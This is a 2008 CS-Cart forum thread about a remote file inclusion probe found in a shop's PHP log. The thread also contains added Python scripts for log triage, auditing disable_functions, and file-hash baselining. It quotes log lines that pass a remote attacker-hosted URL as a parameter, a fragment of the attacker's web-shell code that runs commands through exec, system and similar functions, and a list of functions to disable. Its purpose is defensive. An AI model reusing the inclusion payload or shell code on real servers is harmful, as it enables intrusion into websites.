PHP Warning

 
  • nedd
  • Senior Member
  • Members
  • Join Date: 13-Jan 08
  • 125 posts

Posted 01 April 2008 - 10:10 PM #1

Hi,

just found this in my shop's PHP events log:

-----------------------------------------------------

[01-Apr-2008 10:17:56] PHP Warning: parse_url(//classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://lvps87-230-0-204.dedicated.hosteurope.de/brk/images/banners/test.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/.../public_html/addons/seo/init.php on line 37
[01-Apr-2008 10:17:56] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/.../public_html/addons/seo/init.php:37) in /home/.../public_html/core/fn_common.php on line 1993
[01-Apr-2008 10:17:56] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/.../public_html/addons/seo/init.php:37) in /home/.../public_html/core/fn_common.php on line 1993
[01-Apr-2008 10:18:15] PHP Warning: parse_url(//classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://lvps87-230-0-204.dedicated.hosteurope.de/brk/images/banners/test.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/.../public_html/addons/seo/init.php on line 37
[01-Apr-2008 10:18:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/.../public_html/addons/seo/init.php:37) in /home/.../public_html/core/fn_common.php on line 1993
[01-Apr-2008 10:18:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/.../public_html/addons/seo/init.php:37) in /home/.../public_html/core/fn_common.php on line 1993

-----------------------------------------------------

Is this a hacking attempt or what?! Any advice is appreciated.

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 01 April 2008 - 10:57 PM #2

Yes it is a hacking attempt of sorts.

Your site was scanned and an attempt to run that remote file was made but it failed on at least these attempts. This was a known vulnerability back in versions 1.3.2 and 1.3.3 and supposedly patched. I still see many of these attempts on phpmailer even on the newer cs-cart installs.

That included file basically searches for vulnerable functions on the server and if found, it will be followed by a php shell script someone could use to do real damage to your site or even others on the server depending on the security in place.
Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]
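
Added example, not part of the original posts: a Python script that separates probe entries like the ones in the first post from ordinary warnings by looking for a query parameter whose value is a remote URL in the request that `parse_url()` echoed. The log format is assumed to be the one shown in this thread; the sample lines, `remote.example` and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Assumed format: the PHP 5 style in this thread, where the warning echoes
# the request string that was handed to parse_url().
WARN_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] PHP Warning:\s+parse_url\((?P<req>.*?)\)\s+\[")
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def classify(line):
    """Return details of a remote-include probe, or None for any other line."""
    m = WARN_RE.match(line)
    if not m:
        return None
    script, _, query = m.group("req").partition("?")
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_RE.match(value):  # parameter value is itself a remote URL
            return {"ts": m.group("ts"), "script": script, "param": name,
                    "host": urlsplit(value).hostname}
    return None

def triage(lines):
    """Group probe timestamps by (script, parameter, remote host)."""
    hits = {}
    for line in lines:
        hit = classify(line)
        if hit:
            key = (hit["script"], hit["param"], hit["host"])
            hits.setdefault(key, []).append(hit["ts"])
    return hits

# Constructed sample lines modelled on the entries quoted in this thread.
_PROBE = ("PHP Warning: parse_url(//classes/phpmailer/class.cs_phpmailer.php"
          "?classes_dir=http://remote.example/probe.txt??) "
          "[<a href='function.parse-url'>function.parse-url</a>]: "
          "Unable to parse URL in /home/user/public_html/addons/seo/init.php on line 37")
SAMPLE = [
    "[01-Apr-2008 10:17:56] " + _PROBE,
    "[01-Apr-2008 10:17:56] PHP Warning: Cannot modify header information - "
    "headers already sent in /home/user/public_html/core/fn_common.php on line 1993",
    "[01-Apr-2008 10:18:15] " + _PROBE,
    "[02-Apr-2008 12:07:20] PHP Fatal error:  Allowed memory size of 25165824 "
    "bytes exhausted (tried to allocate 204801 bytes) in /home/user/x.tpl.php on line 38",
]

if __name__ == "__main__":
    for (script, param, host), stamps in triage(SAMPLE).items():
        print(f"{len(stamps)} probe(s): {param}= on {script} -> {host}, "
              f"{stamps[0]} to {stamps[-1]}")
```
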

 
  • nedd
  • Senior Member
  • Members
  • Join Date: 13-Jan 08
  • 125 posts

Posted 01 April 2008 - 11:14 PM #3

Thanks for the explanation S-Combs!

So if this happens again, should I ignore it, or is there anything I need to do to prevent these kinds of hacking attempts?

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 01 April 2008 - 11:46 PM #4

You should never ignore these because if a shell is ever executed on your account successfully, then you have serious troubles.

I recommend running a phpinfo script just to see if your host is disabling any dangerous functions to start with. If they are not then you should find another home even if they are running other security measures like mod_security.

Look down the phpinfo script until you find disable_functions

Beside that there should be at least a few functions listed that may include some of these below:

shell_exec,exec,system,passthru,popen,proc_open,pass_thru,pcntl_exec,proc_close,proc_get_status,proc_nice,proc_terminate, escapeshellarg,show_source,ini_alter

If there is nothing listed then there is nothing protecting you if a shell script was able to get thru the server's primary security onto your account as they already tried above. They might have security to prevent this shell from accessing other accounts on the server, but nothing will stop that hacker from accessing or destroying your own files and database if they desire.

Some important functions to disable are:
shell_exec,exec,system,passthru,popen

If these are disabled then the phpshell cannot run properly or at all on the server.

This particular script tried on you was looking for these same functions to see if a shell will work.
    if (function_exists('exec'))
    {
        @exec($cfe, $res);
        $res = join("\n", $res);
    }
    elseif (function_exists('shell_exec'))
    {
        $res = @shell_exec($cfe);
    }
    elseif (function_exists('system'))
    {
        @ob_start();
        @system($cfe);
        $res = @ob_get_contents();
        @ob_end_clean();
    }
    elseif (function_exists('passthru'))
    {
        @ob_start();
        @passthru($cfe);
        $res = @ob_get_contents();
        @ob_end_clean();
    }
    elseif (@is_resource($f = @popen($cfe, "r")))

Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]
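
Added example, not part of the original posts: the phpinfo check described above as a Python script. It takes the `disable_functions` value copied from the phpinfo page (phpinfo prints "no value" when the setting is empty) and reports which of the five functions called important above are still enabled, plus any listed entry that matches one of them only once underscores are ignored. The function names and sample values are constructed for illustration.

```python
import re

# The five functions post #4 singles out as important to disable.
IMPORTANT = ("shell_exec", "exec", "system", "passthru", "popen")

def parse_value(value):
    """Split the disable_functions value as copied from a phpinfo() page."""
    value = value.strip().strip('"')
    if not value or value.lower() == "no value":  # phpinfo's text when unset
        return []
    return [name for name in re.split(r"[,\s]+", value) if name]

def audit(value):
    """Report which IMPORTANT functions are disabled or still enabled, and
    which enabled ones have a look-alike entry (differs only by underscores)."""
    listed = parse_value(value)
    squashed = {name.replace("_", ""): name for name in listed}
    report = {"disabled": [], "enabled": [], "suspect": {}}
    for func in IMPORTANT:
        if func in listed:
            report["disabled"].append(func)
            continue
        report["enabled"].append(func)
        near = squashed.get(func.replace("_", ""))
        if near:  # e.g. a mistyped entry that leaves the real function enabled
            report["suspect"][func] = near
    return report

# Constructed sample values, not taken from any real host.
SAMPLES = {
    "nothing disabled": "no value",
    "partial, one mistyped": "exec, system,pass_thru,proc_open,popen",
    "all five": "shell_exec,exec,system,passthru,popen",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        r = audit(value)
        print(f"{label}: still enabled = {r['enabled'] or 'none'}, "
              f"check spelling = {r['suspect'] or 'none'}")
```
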

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 01 April 2008 - 11:59 PM #5

I forgot to finish, hehe


The best thing that you can do on your end to prevent these attempts from working is keep your scripts upgraded and properly secured. It is also a great idea to remove any files or directories not needed (even inside the scripts). That makes it easier to notice additional files that should not be there. If someone was to get a shell to work, the first thing they will do is make a few copies of it scattered amongst the other files. These will usually be in writable/executable directories but not always.
Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]
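
Added example, not part of the original posts: one way to notice files that should not be there, as a Python baseline check. It records a SHA-256 for every file under the store directory, then on a later run lists files that were added or changed and groups added files with identical content, which is the scattered-copies pattern described above. The function names and the demo tree are constructed for illustration.

```python
import hashlib
import os
import tempfile

def snapshot(root):
    """Map each file's path (relative to root) to the SHA-256 of its content."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            manifest[os.path.relpath(full, root)] = digest
    return manifest

def compare(baseline, current):
    """Return files added or changed since the baseline, plus groups of added
    files that share identical content (copies of one file in several places)."""
    added = sorted(p for p in current if p not in baseline)
    changed = sorted(p for p in current
                     if p in baseline and current[p] != baseline[p])
    by_hash = {}
    for path in added:
        by_hash.setdefault(current[path], []).append(path)
    copies = [paths for paths in by_hash.values() if len(paths) > 1]
    return {"added": added, "changed": changed, "copies": copies}

if __name__ == "__main__":
    # Constructed demo tree: take a baseline, drop two identical files, re-check.
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "images"))
        os.makedirs(os.path.join(root, "var", "cache"))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php // storefront")
        baseline = snapshot(root)
        for rel in (os.path.join("images", "thumb.php"),
                    os.path.join("var", "cache", "tmp.php")):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write("constructed placeholder")
        print(compare(baseline, snapshot(root)))
```

Store the baseline somewhere the web server account cannot write, otherwise anyone who can add files can also rewrite the record they are compared against.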

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 02 April 2008 - 03:28 PM #6

Oh this got me worried now. I have entries. How would I know what is legitimate and what is hack attempt and further if any have been successful?

BarryH

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 02 April 2008 - 06:18 PM #7

This is an example from log (only ones today).

[02-Apr-2008 12:07:20] PHP Fatal error:  Allowed memory size of 25165824 bytes exhausted (tried to allocate 204801 bytes) in /****/********/public_html/var/compiled/admin/%%E4^E42^E4252AD1%%mainbox.tpl.php on line 38
[02-Apr-2008 12:54:09] PHP Warning:  Cannot modify header information - headers already sent by (output started at /****/********/public_html/include/admin/template_editor.php:61) in Unknown on line 0

Is this a hack? Was it a failure or successful?

:confused: :confused: :confused:
BarryH



 
  • MikeFold
  • Senior Member
  • Members
  • Join Date: 24-Nov 06
  • 1034 posts

Posted 02 April 2008 - 06:30 PM #8

I am no expert, but that does not look like a hack attempt.

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 02 April 2008 - 06:41 PM #9

Thanks Mike

I was hacked on siteground and didn't know what hit me!

I am paranoid now, but don't have 1% of the knowledge required.

BarryH



 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 03 April 2008 - 12:08 AM #10

No, those are not hacking attempts, but there is a problem if your store is consuming more than 24mb often. Keep an eye on these logs and if you see this often then you should try to sort out that issue causing it.

 

Posted 03 April 2008 - 12:45 AM #11

No, those are not hacking attempts, but there is a problem if your store is consuming more than 24mb often. Keep an eye on these logs and if you see this often then you should try to sort out that issue causing it.


As Scott just mentioned, it's because something's using resources a bit too heavily.
When I first installed a mod that I created to hide prices from users without an account, every page load showed that error. Only realised soon after it was because I had left a large amount of mismatching tags (If) etc. which still closed, allowing the Smarty debugger to continue... only after it ate half the server's RAM loading the page.
I've moved on from CS-Cart to WooC******** - If you need anything I can be of little help.

 
  • nedd
  • Senior Member
  • Members
  • Join Date: 13-Jan 08
  • 125 posts

Posted 03 April 2008 - 01:17 AM #12

This is what I got from my host regarding my hacking attempt issue and S-Combs' security recommendations:

"We adhere to strict security policies, and our servers are audited and policies reevaluated on a regular basis. To be honest, if you are to run a website you should get very used to seeing hacking attempts. A typical server will see hundreds if not thousands of exploit attempts on top of password guessing attempts on various services on any given week.

The practices mentioned in your e-mail are all things to mitigate attacks if an attack is successful. They are not ways to prevent it from happening to begin with. While we do take such steps, the only way to prevent it from happening to begin with is vigilance. Subscribe to mailing lists for all of the software you are using especially release and security related lists. Keep things updated at all times.

Most people are surprised when they learn that there is a steady and constant stream of noise related to automatic scanners and hacking attempts. Most panic, and there's simply not much we can do other than tell them it's normal and to try to get used to it."